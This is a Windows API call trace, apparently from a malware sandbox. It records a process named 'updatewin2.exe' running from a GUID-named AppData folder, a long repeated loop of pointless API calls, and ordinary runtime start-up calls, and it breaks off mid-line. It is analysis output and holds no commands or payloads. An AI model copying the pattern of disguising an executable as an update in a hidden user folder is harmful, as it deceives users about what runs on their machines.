0 [0173.297] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.297] AddAtomA (lpString=0x0) returned 0x0 [0173.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.297] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.297] AddAtomA (lpString=0x0) returned 0x0 [0173.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.297] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.297] AddAtomA (lpString=0x0) returned 0x0 [0173.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.297] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.297] AddAtomA (lpString=0x0) returned 0x0 [0173.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.297] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.298] AddAtomA (lpString=0x0) returned 0x0 [0173.298] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.298] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.298] AddAtomA (lpString=0x0) returned 0x0 [0173.298] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.298] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.298] AddAtomA (lpString=0x0) returned 0x0 [0173.298] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.298] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.298] AddAtomA (lpString=0x0) returned 0x0 [0173.298] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.298] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.298] AddAtomA (lpString=0x0) returned 0x0 [0173.298] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.298] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.298] AddAtomA (lpString=0x0) returned 0x0 [0173.298] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.298] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.298] AddAtomA (lpString=0x0) returned 0x0 [0173.298] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.298] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.299] AddAtomA (lpString=0x0) returned 0x0 [0173.299] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.299] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.299] AddAtomA (lpString=0x0) returned 0x0 [0173.299] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.299] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.299] AddAtomA (lpString=0x0) returned 0x0 [0173.299] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.299] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.299] AddAtomA (lpString=0x0) returned 0x0 [0173.299] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.299] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.299] AddAtomA (lpString=0x0) returned 0x0 [0173.299] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.299] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.299] AddAtomA (lpString=0x0) returned 0x0 [0173.299] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.299] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.299] AddAtomA (lpString=0x0) returned 0x0 [0173.299] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.299] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.299] AddAtomA (lpString=0x0) returned 0x0 [0173.299] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.300] AddAtomA (lpString=0x0) returned 0x0 [0173.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.300] AddAtomA (lpString=0x0) returned 0x0 [0173.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.300] AddAtomA (lpString=0x0) returned 0x0 [0173.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.300] AddAtomA (lpString=0x0) returned 0x0 [0173.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.300] AddAtomA (lpString=0x0) returned 0x0 [0173.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.300] AddAtomA (lpString=0x0) returned 0x0 [0173.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.300] AddAtomA (lpString=0x0) returned 0x0 [0173.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.301] AddAtomA (lpString=0x0) returned 0x0 [0173.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.301] AddAtomA (lpString=0x0) returned 0x0 [0173.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.301] AddAtomA (lpString=0x0) returned 0x0 [0173.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.301] AddAtomA (lpString=0x0) returned 0x0 [0173.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.301] AddAtomA (lpString=0x0) returned 0x0 [0173.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.301] AddAtomA (lpString=0x0) returned 0x0 [0173.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.301] AddAtomA (lpString=0x0) returned 0x0 [0173.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.302] AddAtomA (lpString=0x0) returned 0x0 [0173.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.302] AddAtomA (lpString=0x0) returned 0x0 [0173.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.302] AddAtomA (lpString=0x0) returned 0x0 [0173.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.302] AddAtomA (lpString=0x0) returned 0x0 [0173.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.302] AddAtomA (lpString=0x0) returned 0x0 [0173.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.302] AddAtomA (lpString=0x0) returned 0x0 [0173.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.302] AddAtomA (lpString=0x0) returned 0x0 [0173.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.303] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.303] AddAtomA (lpString=0x0) returned 0x0 [0173.303] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.303] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.303] AddAtomA (lpString=0x0) returned 0x0 [0173.303] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.303] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.303] AddAtomA (lpString=0x0) returned 0x0 [0173.303] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.303] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.303] AddAtomA (lpString=0x0) returned 0x0 [0173.303] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.303] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.303] AddAtomA (lpString=0x0) returned 0x0 [0173.303] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.303] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.303] AddAtomA (lpString=0x0) returned 0x0 [0173.303] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.303] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.303] AddAtomA (lpString=0x0) Process: id = "11" image_name = "updatewin2.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin2.exe" page_root = "0x38056000" os_pid = "0x75c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x6c8" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin2.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 123 os_tid = 0x6cc [0171.161] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x1cd0b600, dwHighDateTime=0x1d69ad5)) [0171.161] GetCurrentProcessId () returned 0x75c [0171.161] GetCurrentThreadId () returned 0x6cc [0171.161] GetTickCount () returned 0x115a15e [0171.161] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=29104154078) returned 1 [0171.162] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0171.162] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x1d80000 [0171.166] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0171.166] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0171.166] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0171.166] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0171.166] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0171.167] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0171.167] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0171.167] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0171.168] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0171.168] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0171.168] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0171.168] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0171.168] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0171.168] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0171.168] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0171.168] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0171.169] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0171.169] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0171.169] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0171.170] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0171.170] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0171.170] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x214) returned 0x1d807d0 [0171.170] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0171.170] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0171.171] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0171.171] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0171.171] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0171.171] GetCurrentThreadId () returned 0x6cc [0171.171] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0171.171] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x800) returned 0x1d809f0 [0171.171] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0171.171] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0171.171] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0171.172] SetHandleCount (uNumber=0x20) returned 0x20 [0171.172] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin2.exe\" " [0171.172] GetEnvironmentStringsW () returned 0x624e70* [0171.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0171.172] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x0, Size=0x565) returned 0x1d811f8 [0171.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x1d811f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0171.172] FreeEnvironmentStringsW (penv=0x624e70) returned 1 [0171.172] GetLastError () returned 0x0 [0171.172] SetLastError (dwErrCode=0x0) [0171.172] GetLastError () returned 0x0 [0171.172] SetLastError (dwErrCode=0x0) [0171.173] GetLastError () returned 0x0 [0171.173] SetLastError (dwErrCode=0x0) [0171.173] GetACP () returned 0x4e4 [0171.173] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x0, Size=0x220) returned 0x1d81768 [0171.173] GetLastError () returned 0x0 [0171.173] SetLastError (dwErrCode=0x0) [0171.173] IsValidCodePage (CodePage=0x4e4) returned 1 [0171.173] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0171.173] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0171.173] GetLastError () returned 0x0 [0171.173] SetLastError (dwErrCode=0x0) [0171.173] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0171.173] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0171.174] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0171.174] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0171.174] GetLastError () returned 0x0 [0171.174] SetLastError (dwErrCode=0x0) [0171.174] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0171.174] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0171.174] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䝵뒇㞅AĀ") returned 256 [0171.174] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䝵뒇㞅AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0171.174] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䝵뒇㞅AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0171.174] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ«WµÚ\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0171.174] 